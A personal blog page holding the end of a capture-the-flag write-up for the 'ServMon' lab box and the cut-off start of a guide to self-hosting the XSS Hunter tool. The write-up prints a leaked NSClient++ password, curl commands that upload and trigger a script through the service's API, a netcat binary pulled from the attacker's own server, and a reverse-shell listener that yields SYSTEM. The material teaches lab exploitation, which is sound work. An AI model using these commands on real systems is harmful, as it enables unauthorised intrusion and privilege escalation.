CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.49:47510 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.49:47562 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.49:47830 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.49:47866 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.97:49926 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.97:49946 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.97:52100 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.97:54970 CLOSE_WAIT 3100 TCP 10.10.10.184:6699 10.10.14.97:55518 ESTABLISHED 3100 TCP 10.10.10.184:6699 10.10.14.97:56248 ESTABLISHED 3100 TCP 127.0.0.1:49674 127.0.0.1:49675 ESTABLISHED 3100 TCP 127.0.0.1:49675 127.0.0.1:49674 ESTABLISHED 3100 TCP 127.0.0.1:49676 127.0.0.1:49677 ESTABLISHED 3100 TCP 127.0.0.1:49677 127.0.0.1:49676 ESTABLISHED 3100 TCP [::]:21 [::]:0 LISTENING 2644 TCP [::]:22 [::]:0 LISTENING 2784 TCP [::]:135 [::]:0 LISTENING 872 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:5666 [::]:0 LISTENING 3380 TCP [::]:49664 [::]:0 LISTENING 628 TCP [::]:49665 [::]:0 LISTENING 484 TCP [::]:49666 [::]:0 LISTENING 1120 TCP [::]:49667 [::]:0 LISTENING 1528 TCP [::]:49668 [::]:0 LISTENING 2092 TCP [::]:49669 [::]:0 LISTENING 620 TCP [::]:49670 [::]:0 LISTENING 2480 UDP 0.0.0.0:123 *:* 3768 UDP 0.0.0.0:500 *:* 2488 UDP 0.0.0.0:4500 *:* 2488 UDP 0.0.0.0:5050 *:* 4880 UDP 0.0.0.0:5353 *:* 1616 UDP 0.0.0.0:5355 *:* 1616 UDP 0.0.0.0:61812 *:* 3380 UDP 10.10.10.184:137 *:* 4 UDP 10.10.10.184:138 *:* 4 UDP 10.10.10.184:1900 *:* 5032 UDP 10.10.10.184:23456 *:* 3100 UDP 10.10.10.184:23456 *:* 3100 UDP 10.10.10.184:57058 *:* 3100 UDP 10.10.10.184:58079 *:* 5032 UDP 127.0.0.1:1900 *:* 5032 UDP 127.0.0.1:58080 *:* 5032 UDP 127.0.0.1:61811 *:* 3380 UDP 127.0.0.1:61850 *:* 2968 UDP [::]:123 *:* 3768 UDP [::]:500 *:* 2488 UDP [::]:4500 *:* 2488 UDP [::]:5353 *:* 1616 UDP [::]:5355 *:* 1616 UDP [::1]:1900 *:* 5032 UDP [::1]:58078 *:* 5032 UDP [fe80::405e:6db1:cf1b:2fec%3]:1900 *:* 5032 UDP [fe80::405e:6db1:cf1b:2fec%3]:58077 *:* 5032 ----------------------------------------------------------- Firewall Status ----------------------------------------------------------- Firewall is Disabled ----------------------------------------------------------- FireWall Rules ----------------------------------------------------------- Name ---- @{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi... @{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi... @{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu... @{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu... @{Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.DesktopAppInstaller/Resour... @{Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.DesktopAppInstaller/Resour... @{Microsoft.DesktopAppInstaller_1.0.32912.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.DesktopAppInstaller/Resour... @{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName} @{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName} ... SNIP ... @{Microsoft.ZuneVideo_10.19101.10711.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.ZuneVideo/resources/IDS_MANIFES... @{Microsoft.ZuneVideo_10.20022.11011.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.ZuneVideo/resources/IDS_MANIFES... Microsoft Solitaire Collection Microsoft Solitaire Collection OneNote OneNote Print 3D Print 3D Skype Skype Xbox Game Bar Xbox Game Bar Xbox Game Bar nvms-1000 nvms-1000 NSClient++ Monitoring Agent Spotify Music Spotify Music Spotify Music Spotify Music Spotify Music Spotify Music Wireless Display Infrastructure Back Channel (TCP-In) Network Discovery (WSD-In) Wi-Fi Direct Network Discovery (In) Cast to Device streaming server (RTCP-Streaming-In) Cast to Device streaming server (RTCP-Streaming-In) Cast to Device streaming server (RTCP-Streaming-In) Cast to Device streaming server (RTSP-Streaming-In) Cast to Device streaming server (RTSP-Streaming-In) Cast to Device streaming server (RTSP-Streaming-In) OpenSSH SSH Server (sshd) Proximity sharing over TCP (TCP sharing-In) File and Printer Sharing (Spooler Service - RPC) Wi-Fi Direct Spooler Use (In) @FirewallAPI.dll,-80201 @FirewallAPI.dll,-80206 AllJoyn Router (TCP-In) AllJoyn Router (UDP-In) Cast to Device functionality (qWave-TCP-In) Cast to Device functionality (qWave-UDP-In) Cast to Device SSDP Discovery (UDP-In) Connected Devices Platform - WiFi Direct Transport (TCP-In) Connected Devices Platform (TCP-In) Connected Devices Platform (UDP-In) Core Networking - Dynamic Host Configuration Protocol (DHCP-In) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In) Core Networking - Teredo (UDP-In) Delivery Optimization (TCP-In) Delivery Optimization (UDP-In) File and Printer Sharing (LLMNR-UDP-In) File and Printer Sharing (Spooler Service - RPC-EPMAP) FTP Server (FTP Traffic-In) FTP Server Passive (FTP Passive Traffic-In) FTP Server Secure (FTP SSL Traffic-In) mDNS (UDP-In) mDNS (UDP-In) mDNS (UDP-In) Network Discovery (LLMNR-UDP-In) Network Discovery (Pub-WSD-In) Network Discovery (SSDP-In) Network Discovery (WSD-In) WFD ASP Coordination Protocol (UDP-In) Wi-Fi Direct Scan Service Use (In) Wireless Display (TCP-In) Cast to Device streaming server (HTTP-Streaming-In) Cast to Device streaming server (HTTP-Streaming-In) Cast to Device streaming server (HTTP-Streaming-In) Cast to Device UPnP Events (TCP-In) Core Networking - Destination Unreachable (ICMPv6-In) Core Networking - Destination Unreachable Fragmentation Needed (ICMPv4-In) Core Networking - Internet Group Management Protocol (IGMP-In) Core Networking - IPHTTPS (TCP-In) Core Networking - IPv6 (IPv6-In) Core Networking - Multicast Listener Done (ICMPv6-In) Core Networking - Multicast Listener Query (ICMPv6-In) Core Networking - Multicast Listener Report (ICMPv6-In) Core Networking - Multicast Listener Report v2 (ICMPv6-In) Core Networking - Neighbour Discovery Advertisement (ICMPv6-In) Core Networking - Neighbour Discovery Solicitation (ICMPv6-In) Core Networking - Packet Too Big (ICMPv6-In) Core Networking - Parameter Problem (ICMPv6-In) Core Networking - Router Advertisement (ICMPv6-In) Core Networking - Router Solicitation (ICMPv6-In) Core Networking - Time Exceeded (ICMPv6-In) DIAL protocol server (HTTP-In) DIAL protocol server (HTTP-In) File and Printer Sharing (Echo Request - ICMPv4-In) File and Printer Sharing (Echo Request - ICMPv6-In) File and Printer Sharing (NB-Datagram-In) File and Printer Sharing (NB-Name-In) File and Printer Sharing (NB-Session-In) File and Printer Sharing (SMB-In) Network Discovery (NB-Datagram-In) Network Discovery (NB-Name-In) Network Discovery (UPnP-In) Network Discovery (WSD Events-In) Network Discovery (WSD EventsSecure-In) WFD Driver-only (TCP-In) WFD Driver-only (UDP-In) @{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi... @{Microsoft.AAD.BrokerPlugin_1000.17763.1.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugi... @{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu... @{Microsoft.AAD.BrokerPlugin_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlu... @{Microsoft.AccountsControl_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources... @{Microsoft.AccountsControl_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resources... @{Microsoft.AccountsControl_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resourc... @{Microsoft.AccountsControl_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.AccountsControl/Resourc... @{Microsoft.BingNews_4.36.20714.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.BingNews/Resources/ApplicationTitleW... @{Microsoft.BingWeather_4.34.13393.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.BingWeather/Resources/Application... ... SNIP ... @{Microsoft.GetHelp_10.1912.30071.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.GetHelp/Resources/appDisplayName} @{Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Getstarted/Resources/AppStoreName} @{Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Getstarted/Resources/AppStoreName} @{Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Getstarted/Resources/AppStoreName} @{Microsoft.LockApp_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName} @{Microsoft.LockApp_10.0.17763.1_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName} @{Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName} @{Microsoft.LockApp_10.0.18362.449_neutral__cw5n1h2txyewy?ms-resource://Microsoft.LockApp/resources/AppDisplayName} @{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName} @{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName} @{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName} @{Microsoft.Messaging_4.1901.10241.1000_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Messaging/Resources/AppStoreName} @{Microsoft.Microsoft3DViewer_7.1908.9012.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Microsoft3DViewer/Common.V... @{Microsoft.Microsoft3DViewer_7.1908.9012.0_x64__8wekyb3d8bbwe?ms- @{Microsoft.Windows.ParentalControls_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo... @{Microsoft.Windows.ParentalControls_1000.18362.449.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo... @{Microsoft.Windows.PeopleExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo... @{Microsoft.Windows.PeopleExperienceHost_10.0.17763.1_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windo... @{Microsoft.Windows.PeopleExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Win... @{Microsoft.Windows.PeopleExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Win... @{Microsoft.Windows.Photos_2019.19081.22010.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Windows.Photos/Resources... @{Microsoft.Windows.Photos_2019.19081.22010.0_x64__8wekyb3d8bbwe?ms-resource://Microsoft.Windows.Photos/Resources... ... SNIP ... Proximity sharing over TCP (TCP sharing-Out) Wi-Fi Direct Spooler Use (Out) @FirewallAPI.dll,-80204 AllJoyn Router (TCP-Out) AllJoyn Router (UDP-Out) Cast to Device functionality (qWave-TCP-Out) Cast to Device functionality (qWave-UDP-Out) Connected Devices Platform - WiFi Direct Transport (TCP-Out) Connected Devices Platform (TCP-Out) Connected Devices Platform (UDP-Out) Connected User Experiences and Telemetry Core Networking - DNS (UDP-Out) Core Networking - Dynamic Host Configuration Protocol (DHCP-Out) Core Networking - Dynamic Host Configuration Protocol for IPv6 (DHCPV6-Out) Core Networking - Group Policy (TCP-Out) Core Networking - IPHTTPS (TCP-Out) Core Networking - Teredo (UDP-Out) File and Printer Sharing (LLMNR-UDP-Out) FTP Server (FTP Traffic-Out) FTP Server Secure (FTP SSL Traffic-Out) mDNS (UDP-Out) mDNS (UDP-Out) mDNS (UDP-Out) Network Discovery (LLMNR-UDP-Out) Network Discovery (Pub WSD-Out) Network Discovery (SSDP-Out) Network Discovery (UPnPHost-Out) Network Discovery (UPnP-Out) Network Discovery (WSD Events-Out) Network Discovery (WSD EventsSecure-Out) Network Discovery (WSD-Out) Recommended Troubleshooting Client (HTTP/HTTPS Out) WFD ASP Coordination Protocol (UDP-Out) Wi-Fi Direct Scan Service Use (Out) Windows Device Management Enrolment Service (TCP out) Wireless Display (TCP-Out) Wireless Display (UDP-Out) Core Networking - Group Policy (NP-Out) Core Networking - Internet Group Management Protocol (IGMP-Out) Core Networking - IPv6 (IPv6-Out) Core Networking - Multicast Listener Done (ICMPv6-Out) Core Networking - Multicast Listener Query (ICMPv6-Out) Core Networking - Multicast Listener Report (ICMPv6-Out) Core Networking - Multicast Listener Report v2 (ICMPv6-Out) Core Networking - Neighbour Discovery Advertisement (ICMPv6-Out) Core Networking - Neighbour Discovery Solicitation (ICMPv6-Out) Core Networking - Packet Too Big (ICMPv6-Out) Core Networking - Parameter Problem (ICMPv6-Out) Core Networking - Router Advertisement (ICMPv6-Out) Core Networking - Router Solicitation (ICMPv6-Out) Core Networking - Time Exceeded (ICMPv6-Out) File and Printer Sharing (Echo Request - ICMPv4-Out) File and Printer Sharing (Echo Request - ICMPv6-Out) File and Printer Sharing (NB-Datagram-Out) File and Printer Sharing (NB-Name-Out) File and Printer Sharing (NB-Session-Out) File and Printer Sharing (SMB-Out) Network Discovery (NB-Datagram-Out) Network Discovery (NB-Name-Out) WFD Driver-only (TCP-Out) WFD Driver-only (UDP-Out) ----------------------------------------------------------- Hosts File Content ----------------------------------------------------------- # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost ----------------------------------------------------------- Processes ----------------------------------------------------------- ----------------------------------------------------------- Scheduled Tasks ----------------------------------------------------------- Current System Time: 06/20/2020 04:03:44 TaskName : \OneDrive Standalone Update Task-S-1-5-21-3877449121-2587550681-992675040-1002 Run As User : SERVMON\Nadine Task To Run : %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe TaskName : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Run As User : SYSTEM Task To Run : COM handler TaskName : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Run As User : SYSTEM Task To Run : COM handler TaskName : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 64 Critical Run As User : SYSTEM Task To Run : COM handler TaskName : \Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.30319 Critical Run As User : SYSTEM Task To Run : COM handler ...SNIP ... TaskName : \Microsoft\Windows\Workplace Join\Recovery-Check Run As User : INTERACTIVE Task To Run : %SystemRoot%\System32\dsregcmd.exe /checkrecovery TaskName : \Microsoft\Windows\WwanSvc\NotificationTask Run As User : INTERACTIVE Task To Run : %SystemRoot%\System32\WiFiTask.exe wwan TaskName : \Microsoft\XblGameSave\XblGameSaveTask Run As User : SYSTEM Task To Run : %windir%\System32\XblGameSaveTask.exe standby ----------------------------------------------------------- Services ----------------------------------------------------------- ----------------------------------------------------------- Installed Programs ----------------------------------------------------------- ----------------------------------------------------------- Installed Patches ----------------------------------------------------------- ----------------------------------------------------------- Program Folders ----------------------------------------------------------- C:\Program Files ------------- Common Files Internet Explorer ModifiableWindowsApps NSClient++ Reference Assemblies UNP VMware Windows Defender Windows Defender Advanced Threat Protection Windows Mail Windows Multimedia Platform Windows NT Windows Photo Viewer Windows Portable Devices Windows Security WindowsPowerShell C:\Program Files (x86) ------------------- Common Files InstallShield Installation Information Internet Explorer Microsoft.NET NVMS-1000 Reference Assemblies Windows Defender Windows Mail Windows Multimedia Platform Windows NT Windows Photo Viewer Windows Portable Devices WindowsPowerShell ----------------------------------------------------------- Files with Full Control and Modify Access ----------------------------------------------------------- C:\Users\Nadine\Desktop\user.txt C:\Users\Nadine\out.txt C:\Users\Nadine\scan.txt Failed to read more files ----------------------------------------------------------- Folders with Full Control and Modify Access ----------------------------------------------------------- Failed to read more folders Failed to read more folders Failed to read more folders Failed to read more folders ----------------------------------------------------------- Mapped Drives ----------------------------------------------------------- ----------------------------------------------------------- Unquoted Service Paths ----------------------------------------------------------- ----------------------------------------------------------- Recent Documents ----------------------------------------------------------- AutomaticDestinations CustomDestinations The Internet.lnk ----------------------------------------------------------- Potentially Interesting Files in Users Directory ----------------------------------------------------------- C:\Users\Nadine\Desktop\user.txt C:\Users\Nadine\out.txt C:\Users\Nadine\scan.txt ----------------------------------------------------------- 10 Last Modified Files in C:\User ----------------------------------------------------------- C:\Users\Nadine\Links C:\Users\Nadine\Desktop C:\Users\Nadine\Documents C:\Users\Administrator C:\Users\Public C:\Users\Nathan C:\Users\Nadine\Desktop\user.txt C:\Users\Nadine\out.txt C:\Users\Nadine C:\Users\Nadine\scan.txt ----------------------------------------------------------- MUICache Files ----------------------------------------------------------- ----------------------------------------------------------- System Files with Passwords ----------------------------------------------------------- ----------------------------------------------------------- AlwaysInstalledElevated Registry Key ----------------------------------------------------------- ----------------------------------------------------------- Stored Credentials ----------------------------------------------------------- Currently stored credentials: * NONE * ----------------------------------------------------------- Checking for AutoAdminLogon ----------------------------------------------------------- The default username is Nathan The default password is The default domainname is SERVMON
Anyway, while digging through the NSClient++ folder, I found some interesting files.
NSClient++ Folder contents
After investigating a few of the files (boot.ini, changelog.txt, nsclient.log content of security/, scripts/, and crash-dumps) I decided to look at the most likely culprit - nsclient.ini. I like looking at the most likely candidate last, so that I do a thorough investigating of all the content. If I check the most interesting file first and find something, it often leads me down rabbit holes and results in me tunneling on a single piece of information.
As expected, nsclient.ini has some interesting content:
$ nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini ´╗┐# If you want to fill this file with all available options run the following command: # nscp settings --generate --add-defaults --load-all # If you want to activate a module and bring in all its options use: # nscp settings --activate-module --add-defaults # For details run: nscp settings --help ; in flight - TODO [/settings/default] ; Undocumented key password = ew2x6SsGTxjRwXOT ; Undocumented key allowed hosts = 127.0.0.1 ; in flight - TODO [/settings/NRPE/server] ; Undocumented key ssl options = no-sslv2,no-sslv3 ; Undocumented key verify mode = peer-cert ; Undocumented key insecure = false ; in flight - TODO [/modules] ; Undocumented key CheckHelpers = disabled ; Undocumented key CheckEventLog = disabled ; Undocumented key CheckNSCP = disabled ; Undocumented key CheckDisk = disabled ; Undocumented key CheckSystem = disabled ; Undocumented key WEBServer = enabled ; Undocumented key NRPEServer = enabled ; CheckTaskSched - Check status of your scheduled jobs. CheckTaskSched = enabled ; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA Scheduler = enabled ; CheckExternalScripts - Module used to execute external scripts CheckExternalScripts = enabled ; Script wrappings - A list of templates for defining script commands. Enter any command line here a nd they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be repla ced by the actual script an %ARGS% will be replaced by any given arguments. [/settings/external scripts/wrappings] ; Batch file - Command used for executing wrapped batch files bat = scripts\\%SCRIPT% %ARGS% ; Visual basic script - Command line used for wrapped vbs scripts vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS% ; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT% `" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command - ; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments` [/settings/external scripts/scripts] ; Schedules - Section for the Scheduler module. [/settings/scheduler/schedules] ; Undocumented key foobar = command = foobar ; External script settings - General settings for the external scripts module (CheckExternalScripts) . [/settings/external scripts] allow arguments = true
nsclient.ini
As we can see, there are two interesting pieces of information in here:
The password: ew2x6SsGTxjRwXOT
The fact that access is restricted to 127.0.0.1
Of course, I still wanted to verify, so I tried to log in. Surprisingly enough, it did not work.
Configfiles don't lie!
So, what's next? SSH Port Forwarding to the rescue! There are multiple ways to do it, but since I already had an SSH-connection, I decided to go with the Konami-code approach. In short: On a new line, that has not had any content on it (just press enter...), type the following key combination, followed by hitting the -key: ~C (Capital C is REQIRED!)
That should take you into the following prompt, where you can do SSH magic. Notice how the shell line changes. Also notice that in order to validate the command, another enter is required to pop back to a normal shell.
SSH Forwarding
What happened here is that Port 8443 on my local machine gets forwarded to 127.0.0.1:8443 on ServMon! If this is difficult to understand, check out this video by @Ippsec! The practical explanation of it is that 8443 on my machine is now the same as 8443 on ServMon.
If we access the page and try the password again now, using 127.0.0.1 as the host instead of 10.10.10.184, we can log in to the web interface. The credentials work, so we have verified they are valid!
Success!
Exploiting NSClient++
Unfortunately, this web interface is buggy beyond belief and any attempt I made to use it refused to work. Since I already had found a exploit during previous recon, I decided to check the content of both.
The privilege escalation vulnerability found in Searchsploit was a good match and definitely applied here. It was incredibly frustrating that the web interface didn't respond, as I knew how to exploit it, it just wouldn't let me. No problem though, to the API docs we go!
After lots of searching, reading, testing and guessing, I found two magic API calls! Developers - please use these API docs as a cautionary tale. I am sure the developers of NSClient++ tried their best, but the documentation is very difficult to understand.
Anyways, the two magic commands were:
# Add new script / command - @run4.bat attaches data from the run4.bat file $ curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/run4.bat --data-binary @run4.bat # Trigger script / command $ curl -k -v -H 'password: ew2x6SsGTxjRwXOT' 'https://127.0.0.1:8443/query/run4'
Execution of the above commands looked like this:
Add new command. Note that you have to input the password!
Executing the command
If you are wondering what to put in run4.bat, hold on! We'll get to that in a second. We have figured out how this works, now we need a reverse shell payload! I was stuck here for a while as well, due to limitations on the box.
AntiVirus triggered on normal payloads and PowerShell restricted execution of scripts, leading to all the simple solutions I normally use being blocked (Want to know how I found out? Check the upload-screenshots ¯\_(ツ)_/¯ ).
I considered using MSF Venom to avoid the AV, but figured since it is an easy box that is probably over-engineering things. I decided to try the simple solution of uploading a netcat executable to the box to check if it worked. If not, MSF Venom was waiting patiently for me.
Step 1: Find a netcat binary
Kali comes with netcat binaries by default <3
Step 2: Upload binary to the box
Python server hosting the executable
Pulling the netcat binary down to the ServMon box
Time to create the command used for exploitation. I promise it is called run4 because I like the number 4 and not because it was the fifth iteration of payloads ! (Real programmers start from 0 !!! ^-* )
This was my final payload. Seems easy but I ran into some issues on my way there. (For example, why isn't my command running? Turns out -c is NOT the correct flag for netcat...)
Final iteration of payloads
I made sure to use unique command names for my exploitation in order to avoid issues, but I am not sure if this was necessary. At this point, I was too lazy to check, since the service frequently bugged out and shut down for 10-15 minutes at the time.
Anyway, set up the listener (nc -lvnp 9008), create another command/script and trigger it as indicated above. And OH YEAH - We got root!
Callback received
All that is left is to grab the flag and submit it
Get the root flag
Flag submitted
It was an easy and fun box, except the web interface at the end.
Thanks for reading - See you soon!
And as always, a bonus puppy picture to whoever makes it to the end! This time, it is a two for one special!
Hacker Shiba
Relax Shiba

Installing XSS Hunter

Robin Lunde — Wed, 29 Apr 2020 09:51:12 GMT

UPDATE: NEW AND AMAZING THINGS HAVE HAPPENED:
A new version has been released using docker and updated UI, check it here:
Amazing new XSS Hunter

Why?

As most of you likely already know, you can register and use xsshunter for free at https://xsshunter.com/.
As a quick recap, this is a tool mostly used for hunting blind XSS.
So why would you want to host your own instance?

Full control. If something goes wrong, you can check and investigate.

Stability. You know if the service is up or not. You also decide when to stop running it. Imagine having hundreds of valid payloads ready to execute, then the maintainer takes it down. That would be unfortunate.

You control the data. Companies generally do not like reporters using 3rd party solutions since they cannot verify if data actually is removed or not

Bonus point - you get to learn how it works and how it is designed

Learning is great!
How?

There is a link to a guide available at the XSS Hunter github page
It is a great starting point, but it is quite dated. The same is true for the codebase, so in order to run on Ubuntu 18.04, I had to make various changes. I will walk you through how to get it working in this guide.

Initial steps

I will base this on the original guide.
I will also assume that you have a working server and some basic server management experience. I will still try to go quite in depth though. Please also feel free to ask questions!

What you need:

A VPS or somewhere to host the service

A domain name (Can be bought many places. Here are some: 1, 2, 3)

A wildcard certificate. Get one for the domain you bought by following this guide. There is also official documentation here

Installing XSS Hunter

Getting a mailgun account

Register a mailgun account here - Remeber to uncheck the box marked below!

Remember to uncheck the marked box!

Follow the instructions to verify your email address and phone number

Go to the sending tab and click on your email domain

The aforementioned steps

On the right hand side of the screen, add the email addresses that you want to receive alerts to. This is your actual email adress. For example: john.doe@gmail.com

After having completed the above, click the select button within the square that says API.

Note down your API key and your email domain - you will need it soon!

The email domain is the final part of the API base URL
sandboxe678...

Go to your email inbox and open the email from mailgun

Verify the email address by clicking the link you receive from mailgun. (It will be sent to the address you specify, in the above example john.doe@gmail.com)

Confirm that it works

Use the following command to send an email from your server, to check that the service is working.
Replace the following:
[API_KEY] : Your API key
[API_BASE_URL] : Your API base URL
[YOUR_EMAIL] : Your real email address. For example: john.doe@gmail.com

curl -s --user 'api:[API_KEY]' \ https://api.mailgun.net/v3/[API_BASE_URL]/messages \ -F from='Excited User ' \ -F to=[YOUR_EMAIL] \ -F subject='Hello' \ -F text='Testing some Mailgun awesomeness!'
Send test email using cURL

Note of caution. The EU version of the service has a different URL. A quick google search or checking your mailgun account should show you what needs to be changed.

Check your email account to make sure you received an email like the below. If not, you need to do further troubleshooting before continuing

Test email received successfully
Setting up dependencies

First, install the necessary packages

# install dependencies sudo apt-get install nginx && sudo apt-get install postgresql postgresql-contrib
Install dependencies

Then, set up postgres user and database for XSS Hunter. Change EXAMPLE_PASSWORD with a secure password of your choosing. Please keep this for later! I recommend using a password manager!

sudo -i -u postgres psql template1 CREATE USER xsshunter WITH PASSWORD 'EXAMPLE_PASSWORD'; CREATE DATABASE xsshunter; \q exit
Make postgres database and user
Install the service

First, let's clone the repo:

git clone https://github.com/mandatoryprogrammer/xsshunter cd xsshunter
Clone the git repo

Do note - Python2 is required! It does not support Python3

In order to get the configuration script running, we need to add an additional dependency.

# install yaml support for python sudo apt-get install pyyaml
Add support for yaml to python
Credit to xYantix for giving a working solution in this pull-request

Configure the service

OK, let us proceed. We are ready to run the configuring script!

# generate yaml config file ./generate_config.py
Run config generation script
I will take you through it step by step. To see an example of the output, please see below. In the example output, I have added numbers for easy reference. Otherwise everything should look identical.

Input your domain name. I have used mydomain.com as an example

Enter your Mailgun API key, which you found and saved earlier

Enter your Mailgun Domain Name, which you also wrote down earlier. (The one starting with sandbox)

I believe this could be anything@[Mailgun Domain Name], but I stuck with the default from mailgun here, as it does not really matter. I suggest going with: mailgun@[Mailgun Domain Name]. Remember to replace [Mailgun Domain Name] with your actual value

This is for people to report suspected abuse of the tool. This email should be one you already manage and have access to. For example: john.doe@gmail.com

If you followed this guide, just input xsshunter

Input the password you chose when you created the database. This is referenced as EXAMPLE_PASSWORD above. Please replace [YOUR_REALLY_SECURE_PASSWORD] with the value you chose for EXAMPLE_PASSWORD

Same as in step 6, if you followed this guide, just input xsshunter

Woop, setup done!

If you ever need to change these values, you can edit them directly in the config.yaml file

__ __ _____ _____ _ _ _ \ \ / // ____/ ____| | | | | | | \ V /| (___| (___ | |__| |_ _ _ __ | |_ ___ _ __ > < \___ \\\\___ \ | __ | | | | '_ \| __/ _ \ '__| / . \ ____) |___) | | | | | |_| | | | | || __/ | /_/ \_\_____/_____/ |_| |_|\__,_|_| |_|\__\___|_| Setup Utility (1) What is the base domain name you will be using? (ex. localhost, www.example.com) Domain? mydomain.com Great! Now let's setup your Mailgun account to send XSS alerts to. (2) Enter your API key: (ex. key-8da843ff65205a61374b09b81ed0fa35) Mailgun API key: 92740xxxxxxxxxxxxxxxxxxxxxxxxxxx-65bxxx58-8ffxxxxx (3) What is your Mailgun domain? (ex. example.com) Mailgun domain: sandboxe6784d1f69d9486484bb8db10ab02380.mailgun.org (4) What email address is sending the payload fire emails?: (ex. no-reply@example.com) Sending email address: mailgun@sandboxe6784d1f69d9486484bb8db10ab02380.mailgun.org (5) Where should abuse/contact emails go?: (ex. yourpersonal@gmail.com) Abuse/Contact email: xsshunter@mydomain.com (6) What postgres user is this service using? (ex. xsshunter) Postgres username: xsshunter 